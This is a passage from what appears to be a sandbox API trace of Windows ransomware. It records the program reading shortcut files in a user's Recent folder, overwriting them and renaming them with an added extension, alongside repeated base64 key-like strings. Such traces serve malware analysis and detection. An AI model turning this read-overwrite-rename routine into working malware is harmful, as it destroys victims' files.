lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.551] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.551] GetCurrentThreadId () returned 0x1358 [0106.551] GetCurrentThreadId () returned 0x1358 [0106.551] GetCurrentThreadId () returned 0x1358 [0106.551] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.552] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.552] GetCurrentThreadId () returned 0x1358 [0106.552] GetCurrentThreadId () returned 0x1358 [0106.552] GetCurrentThreadId () returned 0x1358 [0106.552] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\28RvPNiENM.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\28rvpnienm.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.552] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.552] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.552] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3c6 [0106.552] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.552] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3c6, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3c6, lpOverlapped=0x0) returned 1 [0106.553] CloseHandle (hObject=0x3f4) returned 1 [0106.553] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\28RvPNiENM.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\28rvpnienm.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.554] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3c6, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3c6, lpOverlapped=0x0) returned 1 [0106.555] CloseHandle (hObject=0x3f4) returned 1 [0106.556] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\28RvPNiENM.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\28rvpnienm.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\28RvPNiENM.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\28rvpnienm.lnk.mz173801")) returned 1 [0106.556] GetCurrentThreadId () returned 0x1358 [0106.556] GetCurrentThreadId () returned 0x1358 [0106.556] GetCurrentThreadId () returned 0x1358 [0106.556] GetCurrentThreadId () returned 0x1358 [0106.556] GetCurrentThreadId () returned 0x1358 [0106.556] GetCurrentThreadId () returned 0x1358 [0106.556] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x786dd421, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x786dd421, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x786dd421, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x424, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="2ffpB.lnk", cAlternateFileName="")) returned 1 [0106.556] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.556] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.556] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2ffpB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\2ffpb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x786dd421, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x786dd421, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x786dd421, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x424)) returned 1 [0106.557] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.557] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.557] GetCurrentThreadId () returned 0x1358 [0106.557] GetCurrentThreadId () returned 0x1358 [0106.557] GetCurrentThreadId () returned 0x1358 [0106.558] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.558] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.558] GetCurrentThreadId () returned 0x1358 [0106.558] GetCurrentThreadId () returned 0x1358 [0106.558] GetCurrentThreadId () returned 0x1358 [0106.558] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2ffpB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\2ffpb.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.558] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.558] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.558] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x424 [0106.558] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.558] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x424, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x424, lpOverlapped=0x0) returned 1 [0106.559] CloseHandle (hObject=0x3f4) returned 1 [0106.559] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2ffpB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\2ffpb.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.560] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x424, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x424, lpOverlapped=0x0) returned 1 [0106.561] CloseHandle (hObject=0x3f4) returned 1 [0106.562] 